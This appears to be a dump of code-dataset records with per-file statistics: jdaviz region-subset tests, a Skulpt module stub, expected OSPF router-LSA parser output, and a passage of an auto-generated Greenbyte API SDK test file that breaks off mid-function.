    data = Data(flux=np.ones((128, 128)), label='Test 2D Flux')
    jdaviz_app.data_collection.append(data)
    jdaviz_app.add_data_to_viewer('flux-viewer', 'Test 2D Flux')
    jdaviz_app.get_viewer('flux-viewer').apply_roi(RectangularROI(1, 3.5, -0.2, 3.3))
    subsets = jdaviz_app.get_subsets_from_viewer('flux-viewer')
    reg = subsets.get('Subset 1')
    assert len(subsets) == 1
    assert isinstance(reg, RectanglePixelRegion)
    assert_allclose(reg.center.x, 2.25)
    assert_allclose(reg.center.x, 2.25)
    assert_allclose(reg.center.y, 1.55)
    assert_allclose(reg.width, 2.5)
    assert_allclose(reg.height, 3.5)


def test_region_from_subset_3d(jdaviz_app):
    data = Data(flux=np.ones((256, 128, 128)), label='Test 3D Flux')
    jdaviz_app.data_collection.append(data)
    jdaviz_app.add_data_to_viewer('flux-viewer', 'Test 3D Flux')
    jdaviz_app.get_viewer('flux-viewer').apply_roi(RectangularROI(1, 3.5, -0.2, 3.3))
    subsets = jdaviz_app.get_subsets_from_viewer('flux-viewer')
    reg = subsets.get('Subset 1')
    assert len(subsets) == 1
    assert isinstance(reg, RectanglePixelRegion)
    assert_allclose(reg.center.x, 2.25)
    assert_allclose(reg.center.x, 2.25)
    assert_allclose(reg.center.y, 1.55)
    assert_allclose(reg.width, 2.5)
    assert_allclose(reg.height, 3.5)


def test_region_from_subset_profile(jdaviz_app, spectral_cube_wcs):
    data = Data(flux=np.ones((256, 128, 128)), label='Test 1D Flux', coords=spectral_cube_wcs)
    jdaviz_app.data_collection.append(data)
    jdaviz_app.add_data_to_viewer('spectrum-viewer', 'Test 1D Flux')
    jdaviz_app.get_viewer("spectrum-viewer").apply_roi(XRangeROI(1, 3.5))
    subsets = jdaviz_app.get_subsets_from_viewer('spectrum-viewer', subset_type='spectral')
    reg = subsets.get('Subset 1')
    assert len(subsets) == 1
    assert isinstance(reg, RectanglePixelRegion)
    assert_allclose(reg.center.x, 2.25)
    assert_allclose(reg.center.y, 128)
    assert_allclose(reg.width, 2.5)
    assert_allclose(reg.height, 256)


def test_region_spectral_spatial(jdaviz_app, spectral_cube_wcs):
    data = Data(flux=np.ones((256, 128, 128)), label='Test Flux', coords=spectral_cube_wcs)
    jdaviz_app.data_collection.append(data)
    jdaviz_app.add_data_to_viewer('spectrum-viewer', 'Test Flux')
    jdaviz_app.add_data_to_viewer('flux-viewer', 'Test Flux')
    jdaviz_app.get_viewer("spectrum-viewer").apply_roi(XRangeROI(1, 3.5))
    flux_viewer = jdaviz_app.get_viewer("flux-viewer")
    # We set the active tool here to trigger a reset of the Subset state to "Create new"
    flux_viewer.toolbar.active_tool = flux_viewer.toolbar.tools['bqplot:rectangle']
    flux_viewer.apply_roi(RectangularROI(1, 3.5, -0.2, 3.3))
    subsets = jdaviz_app.get_subsets_from_viewer('spectrum-viewer', subset_type='spectral')
    reg = subsets.get('Subset 1')
    assert len(subsets) == 1
    assert isinstance(reg, RectanglePixelRegion)
    assert_allclose(reg.center.x, 2.25)
    assert_allclose(reg.center.y, 128)
    assert_allclose(reg.width, 2.5)
    assert_allclose(reg.height, 256)
    subsets = jdaviz_app.get_subsets_from_viewer('flux-viewer', subset_type='spatial')
    reg = subsets.get('Subset 2')
    assert len(subsets) == 1
    assert isinstance(reg, RectanglePixelRegion)
    assert_allclose(reg.center.x, 2.25)
    assert_allclose(reg.center.x, 2.25)
    assert_allclose(reg.center.y, 1.55)
    assert_allclose(reg.width, 2.5)
    assert_allclose(reg.height, 3.5)
| 33.99115
| 94
| 0.73106
| 580
| 3,841
| 4.62931
| 0.144828
| 0.083799
| 0.145624
| 0.111359
| 0.818622
| 0.804097
| 0.793669
| 0.780261
| 0.780261
| 0.748976
| 0
| 0.042224
| 0.142932
| 3,841
| 112
| 95
| 34.294643
| 0.77339
| 0.021349
| 0
| 0.636364
| 0
| 0
| 0.099548
| 0
| 0
| 0
| 0
| 0
| 0.441558
| 1
| 0.064935
| false
| 0
| 0.090909
| 0.012987
| 0.168831
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c966accaa41da53dee5de330137f3db8c12d88d6
| 46
|
py
|
Python
|
src/lib/BaseHTTPServer.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/BaseHTTPServer.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/BaseHTTPServer.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
import _sk_fail; _sk_fail._("BaseHTTPServer")
| 23
| 45
| 0.804348
| 6
| 46
| 5.333333
| 0.666667
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 46
| 1
| 46
| 46
| 0.744186
| 0
| 0
| 0
| 0
| 0
| 0.304348
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c985ed257c0ec5d698ea9a86f2c000cd53fc0011
| 50
|
py
|
Python
|
sample_app/foo/bar1.py
|
ali5h/pazel
|
c861a358f577c81d6d8298b478bfe4449889be59
|
[
"MIT"
] | null | null | null |
sample_app/foo/bar1.py
|
ali5h/pazel
|
c861a358f577c81d6d8298b478bfe4449889be59
|
[
"MIT"
] | null | null | null |
sample_app/foo/bar1.py
|
ali5h/pazel
|
c861a358f577c81d6d8298b478bfe4449889be59
|
[
"MIT"
] | null | null | null |
import numpy as np


def sample():
    return 1.0
| 8.333333
| 18
| 0.64
| 9
| 50
| 3.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 0.28
| 50
| 5
| 19
| 10
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
a386882a055e1f8e3e9da36d87b41a3fe13fa4b2
| 62,054
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowIpOspfDatabaseRouter/cli/equal/golden_output1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxe/tests/ShowIpOspfDatabaseRouter/cli/equal/golden_output1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxe/tests/ShowIpOspfDatabaseRouter/cli/equal/golden_output1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
"vrf": {
"default": {
"address_family": {
"ipv4": {
"instance": {
"1": {
"areas": {
"0.0.0.0": {
"database": {
"lsa_types": {
1: {
"lsa_type": 1,
"lsas": {
"10.4.1.1 10.4.1.1": {
"adv_router": "10.4.1.1",
"lsa_id": "10.4.1.1",
"ospfv2": {
"body": {
"router": {
"links": {
"10.4.1.1": {
"link_data": "255.255.255.255",
"link_id": "10.4.1.1",
"num_mtid_metrics": 2,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
},
32: {
"metric": 1,
"mt_id": 32,
},
33: {
"metric": 1,
"mt_id": 33,
},
},
"type": "stub network",
},
"10.1.2.1": {
"link_data": "10.1.2.1",
"link_id": "10.1.2.1",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.1.4.4": {
"link_data": "10.1.4.1",
"link_id": "10.1.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
},
"num_of_links": 3,
}
},
"header": {
"adv_router": "10.4.1.1",
"age": 742,
"checksum": "0x6228",
"length": 60,
"lsa_id": "10.4.1.1",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "8000003D",
"type": 1,
},
},
},
"10.16.2.2 10.16.2.2": {
"adv_router": "10.16.2.2",
"lsa_id": "10.16.2.2",
"ospfv2": {
"body": {
"router": {
"links": {
"10.1.2.1": {
"link_data": "10.1.2.2",
"link_id": "10.1.2.1",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.2.3.3": {
"link_data": "10.2.3.2",
"link_id": "10.2.3.3",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.2.4.4": {
"link_data": "10.2.4.2",
"link_id": "10.2.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.16.2.2": {
"link_data": "255.255.255.255",
"link_id": "10.16.2.2",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 4,
}
},
"header": {
"adv_router": "10.16.2.2",
"age": 1520,
"checksum": "0x672A",
"length": 72,
"lsa_id": "10.16.2.2",
"option": "None",
"option_desc": "No TOS-capability, No DC",
"seq_num": "80000013",
"type": 1,
},
},
},
"10.36.3.3 10.36.3.3": {
"adv_router": "10.36.3.3",
"lsa_id": "10.36.3.3",
"ospfv2": {
"body": {
"router": {
"links": {
"10.2.3.3": {
"link_data": "10.2.3.3",
"link_id": "10.2.3.3",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.3.4.4": {
"link_data": "10.3.4.3",
"link_id": "10.3.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.36.3.3": {
"link_data": "255.255.255.255",
"link_id": "10.36.3.3",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 3,
}
},
"header": {
"adv_router": "10.36.3.3",
"age": 235,
"checksum": "0x75F8",
"length": 60,
"lsa_id": "10.36.3.3",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000033",
"type": 1,
},
},
},
"10.64.4.4 10.64.4.4": {
"adv_router": "10.64.4.4",
"lsa_id": "10.64.4.4",
"ospfv2": {
"body": {
"router": {
"links": {
"10.1.4.4": {
"link_data": "10.1.4.4",
"link_id": "10.1.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.2.4.4": {
"link_data": "10.2.4.4",
"link_id": "10.2.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.3.4.4": {
"link_data": "10.3.4.4",
"link_id": "10.3.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.64.4.4": {
"link_data": "255.255.255.255",
"link_id": "10.64.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 4,
}
},
"header": {
"adv_router": "10.64.4.4",
"age": 1486,
"as_boundary_router": True,
"checksum": "0xA57C",
"length": 72,
"lsa_id": "10.64.4.4",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000036",
"type": 1,
},
},
},
},
}
}
}
}
}
},
"2": {
"areas": {
"0.0.0.1": {
"database": {
"lsa_types": {
1: {
"lsa_type": 1,
"lsas": {
"10.229.11.11 10.229.11.11": {
"adv_router": "10.229.11.11",
"lsa_id": "10.229.11.11",
"ospfv2": {
"body": {
"router": {
"links": {
"10.186.5.1": {
"link_data": "10.186.5.1",
"link_id": "10.186.5.1",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.151.22.22": {
"link_data": "0.0.0.14",
"link_id": "10.151.22.22",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 111,
"mt_id": 0,
"tos": 0,
}
},
"type": "another router (point-to-point)",
},
},
"num_of_links": 2,
}
},
"header": {
"adv_router": "10.229.11.11",
"age": 651,
"area_border_router": True,
"as_boundary_router": True,
"checksum": "0x9CE3",
"length": 48,
"lsa_id": "10.229.11.11",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "8000003E",
"type": 1,
},
},
},
"10.151.22.22 10.151.22.22": {
"adv_router": "10.151.22.22",
"lsa_id": "10.151.22.22",
"ospfv2": {
"body": {
"router": {
"links": {
"10.229.11.11": {
"link_data": "0.0.0.6",
"link_id": "10.229.11.11",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "another router (point-to-point)",
},
"10.229.6.6": {
"link_data": "10.229.6.2",
"link_id": "10.229.6.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 40,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
},
"num_of_links": 2,
}
},
"header": {
"adv_router": "10.151.22.22",
"age": 480,
"area_border_router": True,
"as_boundary_router": True,
"checksum": "0xC41A",
"length": 48,
"lsa_id": "10.151.22.22",
"option": "None",
"option_desc": "No TOS-capability, No DC",
"seq_num": "80000019",
"type": 1,
},
},
},
"10.36.3.3 10.36.3.3": {
"adv_router": "10.36.3.3",
"lsa_id": "10.36.3.3",
"ospfv2": {
"body": {
"router": {
"links": {
"10.19.7.7": {
"link_data": "10.19.7.3",
"link_id": "10.19.7.7",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
}
},
"num_of_links": 1,
}
},
"header": {
"adv_router": "10.36.3.3",
"age": 1128,
"area_border_router": True,
"as_boundary_router": True,
"checksum": "0x5845",
"length": 36,
"lsa_id": "10.36.3.3",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000035",
"type": 1,
},
},
},
"10.115.55.55 10.115.55.55": {
"adv_router": "10.115.55.55",
"lsa_id": "10.115.55.55",
"ospfv2": {
"body": {
"router": {
"links": {
"10.186.5.1": {
"link_data": "10.186.5.5",
"link_id": "10.186.5.1",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.115.6.6": {
"link_data": "10.115.6.5",
"link_id": "10.115.6.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 30,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.115.55.55": {
"link_data": "255.255.255.255",
"link_id": "10.115.55.55",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 3,
}
},
"header": {
"adv_router": "10.115.55.55",
"age": 318,
"checksum": "0xE7BC",
"length": 60,
"lsa_id": "10.115.55.55",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000037",
"type": 1,
},
},
},
"10.84.66.66 10.84.66.66": {
"adv_router": "10.84.66.66",
"lsa_id": "10.84.66.66",
"ospfv2": {
"body": {
"router": {
"links": {
"10.229.6.6": {
"link_data": "10.229.6.6",
"link_id": "10.229.6.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.115.6.6": {
"link_data": "10.115.6.6",
"link_id": "10.115.6.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 30,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.166.7.6": {
"link_data": "10.166.7.6",
"link_id": "10.166.7.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 30,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.84.66.66": {
"link_data": "255.255.255.255",
"link_id": "10.84.66.66",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 4,
}
},
"header": {
"adv_router": "10.84.66.66",
"age": 520,
"checksum": "0x1282",
"length": 72,
"lsa_id": "10.84.66.66",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "8000003C",
"type": 1,
},
},
},
"10.1.77.77 10.1.77.77": {
"adv_router": "10.1.77.77",
"lsa_id": "10.1.77.77",
"ospfv2": {
"body": {
"router": {
"links": {
"10.19.7.7": {
"link_data": "10.19.7.7",
"link_id": "10.19.7.7",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.166.7.6": {
"link_data": "10.166.7.7",
"link_id": "10.166.7.6",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 30,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.1.77.77": {
"link_data": "255.255.255.255",
"link_id": "10.1.77.77",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 3,
}
},
"header": {
"adv_router": "10.1.77.77",
"age": 288,
"checksum": "0x1379",
"length": 60,
"lsa_id": "10.1.77.77",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000030",
"type": 1,
},
},
},
},
}
}
}
}
}
},
"3": {
"areas": {
"0.0.0.0": {
"database": {
"lsa_types": {
1: {
"lsa_type": 1,
"lsas": {
"10.115.11.11 10.115.11.11": {
"adv_router": "10.115.11.11",
"lsa_id": "10.115.11.11",
"ospfv2": {
"body": {
"router": {
"links": {
"10.115.11.11": {
"link_data": "255.255.255.255",
"link_id": "10.115.11.11",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
}
},
"num_of_links": 1,
}
},
"header": {
"adv_router": "10.115.11.11",
"age": 50,
"as_boundary_router": True,
"checksum": "0x881A",
"length": 36,
"lsa_id": "10.115.11.11",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000001",
"type": 1,
},
},
}
},
}
}
}
},
"0.0.0.11": {
"database": {
"lsa_types": {
1: {
"lsa_type": 1,
"lsas": {
"10.115.11.11 10.115.11.11": {
"adv_router": "10.115.11.11",
"lsa_id": "10.115.11.11",
"ospfv2": {
"body": {
"router": {
"num_of_links": 0
}
},
"header": {
"adv_router": "10.115.11.11",
"age": 8,
"as_boundary_router": True,
"checksum": "0x1D1B",
"length": 24,
"lsa_id": "10.115.11.11",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000001",
"type": 1,
},
},
}
},
}
}
}
},
}
},
}
}
}
}
}
}
| 81.435696
| 118
| 0.094289
| 1,797
| 62,054
| 3.102393
| 0.067891
| 0.038744
| 0.043049
| 0.043049
| 0.888969
| 0.838027
| 0.756771
| 0.749058
| 0.731659
| 0.631211
| 0
| 0.169689
| 0.850711
| 62,054
| 761
| 119
| 81.542707
| 0.432103
| 0
| 0
| 0.607096
| 0
| 0
| 0.098962
| 0
| 0
| 0
| 0.00116
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6e5cf0af4754b37e4fbdd950657f8e724513ac01
| 13,007
|
py
|
Python
|
tests/controllers/test_data_controller.py
|
charlie9578/greenbyte-api-sdk
|
6835ee1f6a667b5c7827c5248391081f06b75513
|
[
"MIT"
] | null | null | null |
tests/controllers/test_data_controller.py
|
charlie9578/greenbyte-api-sdk
|
6835ee1f6a667b5c7827c5248391081f06b75513
|
[
"MIT"
] | null | null | null |
tests/controllers/test_data_controller.py
|
charlie9578/greenbyte-api-sdk
|
6835ee1f6a667b5c7827c5248391081f06b75513
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
greenbyteapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""

import jsonpickle
import dateutil.parser

from .controller_test_base import ControllerTestBase
from ..test_helper import TestHelper
from greenbyteapi.api_helper import APIHelper


class DataControllerTests(ControllerTestBase):

    @classmethod
    def setUpClass(cls):
        super(DataControllerTests, cls).setUpClass()
        cls.controller = cls.api_client.data

    # Gets authorized data signals for one or more devices.
    #
    #_🔐 This endpoint requires the **Data** endpoint permission._
    #
    #_This request can also be made using the POST method,
    #with a request to `datasignals.json` and
    #a JSON request body instead of query parameters._
    #
    def test_test_get_data_signals(self):
        # Parameters for the API call
        device_ids = APIHelper.json_deserialize('[1,2,3]')

        # Perform the API call through the SDK function
        result = self.controller.get_data_signals(device_ids)

        # Test response code
        self.assertEquals(self.response_catcher.response.status_code, 200)

        # Test headers
        expected_headers = {}
        expected_headers['content-type'] = 'application/json; charset=utf-8'
        self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers))

        # Test whether the captured response is as we expected
        self.assertIsNotNone(result)
        expected_body = APIHelper.json_deserialize(
            '[{"dataSignalId":1,"title":"Wind speed","type":"Wind speed","unit":"m/s","'
            'deviceType":{"deviceTypeId":1,"title":"Turbine"}},{"dataSignalId":5,"title"'
            ':"Power","type":"Power","unit":"kW","deviceType":{"deviceTypeId":1,"title":'
            '"Turbine"}}]'
        )
        received_body = APIHelper.json_deserialize(self.response_catcher.response.raw_body)
        self.assertTrue(TestHelper.match_body(expected_body, received_body))

    # Gets authorized data signals for one or more devices.
    #
    #_🔐 This endpoint requires the **Data** endpoint permission._
    #
    #_This request can also be made using the POST method,
    #with a request to `datasignals.json` and
    #a JSON request body instead of query parameters._
    #
    def test_test_get_data_signals_1(self):
        # Parameters for the API call
        device_ids = APIHelper.json_deserialize('[1,2,3]')

        # Perform the API call through the SDK function
        result = self.controller.get_data_signals(device_ids)

        # Test response code
        self.assertEquals(self.response_catcher.response.status_code, 204)

    # Gets data for multiple devices and data signals in the given
    #resolution. The timestamps are in the time zone configured in the Greenbyte Platform.
    #Use the useUtc flag to get timestamps in UTC for all resolutions other than daily, weekly, monthly and yearly.
    #
    #_🔐 This endpoint requires the **Data** endpoint permission._
    #
    #_This request can also be made using the POST method,
    #with a request to `data.json` and
    #a JSON request body instead of query parameters._
    #
    def test_test_get_data(self):
        # Parameters for the API call
        device_ids = APIHelper.json_deserialize('[1,2,3]')
        data_signal_ids = APIHelper.json_deserialize('[1,5]')
        timestamp_start = APIHelper.RFC3339DateTime.from_value('2020-01-01T00:00:00Z').datetime
        timestamp_end = APIHelper.RFC3339DateTime.from_value('2020-01-08T00:00:00Z').datetime
        use_utc = False
        resolution = '10minute'
        aggregate = 'device'
        aggregate_level = 0
        calculation = 'sum'

        # Perform the API call through the SDK function
        result = self.controller.get_data(device_ids, data_signal_ids, timestamp_start, timestamp_end, use_utc, resolution, aggregate, aggregate_level, calculation)

        # Test response code
        self.assertEquals(self.response_catcher.response.status_code, 200)

        # Test headers
        expected_headers = {}
        expected_headers['content-type'] = 'application/json; charset=utf-8'
        self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers))

        # Test whether the captured response is as we expected
        self.assertIsNotNone(result)
        expected_body = APIHelper.json_deserialize(
            '[{"aggregate":"device","aggregateId":1,"aggregatePathNames":[],"deviceIds"'
            ':[1],"resolution":"hourly","calculation":"sum","dataSignal":{"dataSignalId"'
            ':1,"title":"Wind speed","unit":"m/s"},"data":{"2020-01-01T00:00:00":6.89,"2'
            '020-01-01T01:00:00":8.33}},{"aggregate":"device","aggregateId":1,"aggregate'
            'PathNames":[],"deviceIds":[1],"resolution":"hourly","calculation":"sum","da'
            'taSignal":{"dataSignalId":5,"title":"Power","unit":"kW"},"data":{"2020-01-0'
            '1T00:00:00":584.33,"2020-01-01T01:00:00":1014}}]'
        )
        received_body = APIHelper.json_deserialize(self.response_catcher.response.raw_body)
        self.assertTrue(TestHelper.match_body(expected_body, received_body))

    # Gets data for multiple devices and data signals in the given
    #resolution. The timestamps are in the time zone configured in the Greenbyte Platform.
    #Use the useUtc flag to get timestamps in UTC for all resolutions other than daily, weekly, monthly and yearly.
    #
    #_🔐 This endpoint requires the **Data** endpoint permission._
    #
    #_This request can also be made using the POST method,
    #with a request to `data.json` and
    #a JSON request body instead of query parameters._
    #
    def test_test_get_data_1(self):
        # Parameters for the API call
        device_ids = APIHelper.json_deserialize('[1,2,3]')
        data_signal_ids = APIHelper.json_deserialize('[1,5]')
        timestamp_start = APIHelper.RFC3339DateTime.from_value('2020-01-01T00:00:00Z').datetime
        timestamp_end = APIHelper.RFC3339DateTime.from_value('2020-01-08T00:00:00Z').datetime
        use_utc = False
        resolution = '10minute'
        aggregate = 'device'
        aggregate_level = 0
        calculation = 'sum'

        # Perform the API call through the SDK function
        result = self.controller.get_data(device_ids, data_signal_ids, timestamp_start, timestamp_end, use_utc, resolution, aggregate, aggregate_level, calculation)

        # Test response code
        self.assertEquals(self.response_catcher.response.status_code, 204)

    # Gets the most recent data point for each
    #specified device and data signal. The timestamps are in UTC.
    #
    #_🔐 This endpoint requires the **Data** endpoint permission._
    #
    #_This request can also be made using the POST method,
    #with a request to `realtimedata.json` and
    #a JSON request body instead of query parameters._
    #
    def test_test_get_real_time_data(self):
        # Parameters for the API call
        device_ids = APIHelper.json_deserialize('[1,2,3]')
        data_signal_ids = APIHelper.json_deserialize('[1,5]')
        aggregate = 'device'
        aggregate_level = 0
        calculation = 'sum'

        # Perform the API call through the SDK function
        result = self.controller.get_real_time_data(device_ids, data_signal_ids, aggregate, aggregate_level, calculation)

        # Test response code
        self.assertEquals(self.response_catcher.response.status_code, 200)

        # Test headers
        expected_headers = {}
        expected_headers['content-type'] = 'application/json; charset=utf-8'
        self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers))

        # Test whether the captured response is as we expected
        self.assertIsNotNone(result)
        expected_body = APIHelper.json_deserialize(
            '[{"aggregate":"device","aggregateId":24,"aggregatePathNames":[],"deviceIds'
            '":[24],"calculation":"sum","dataSignal":{"dataSignalId":5,"title":"Power","'
            'unit":"kW"},"data":{"2020-03-17T12:50:02Z":2174}},{"aggregate":"device","ag'
            'gregateId":24,"aggregatePathNames":[],"deviceIds":[24],"calculation":"sum",'
            '"dataSignal":{"dataSignalId":1,"title":"Wind speed","unit":"m/s"},"data":{"'
            '2020-03-17T12:50:02Z":12.2}}]'
        )
        received_body = APIHelper.json_deserialize(self.response_catcher.response.raw_body)
        self.assertTrue(TestHelper.match_body(expected_body, received_body))

    # Gets the most recent data point for each
    #specified device and data signal. The timestamps are in UTC.
    #
    #_🔐 This endpoint requires the **Data** endpoint permission._
    #
    #_This request can also be made using the POST method,
    #with a request to `realtimedata.json` and
    #a JSON request body instead of query parameters._
    #
    def test_test_get_real_time_data_1(self):
        # Parameters for the API call
        device_ids = APIHelper.json_deserialize('[1,2,3]')
        data_signal_ids = APIHelper.json_deserialize('[1,5]')
        aggregate = 'device'
        aggregate_level = 0
        calculation = 'sum'

        # Perform the API call through the SDK function
        result = self.controller.get_real_time_data(device_ids, data_signal_ids, aggregate, aggregate_level, calculation)

        # Test response code
        self.assertEquals(self.response_catcher.response.status_code, 204)

    # Gets signal data aggregated per availability contract category.
    #
    #_🔐 This endpoint requires the **Data** and **Statuses** endpoint permissions._
    #
    #_This request can also be made using the POST method,
    #with a request to `datapercategory.json` and
    #a JSON request body instead of query parameters._
    #
    def test_test_get_data_per_category(self):
        # Parameters for the API call
        device_ids = APIHelper.json_deserialize('[1,2,3]')
        data_signal_id = 248
        timestamp_start = APIHelper.RFC3339DateTime.from_value('2020-01-01T00:00:00Z').datetime
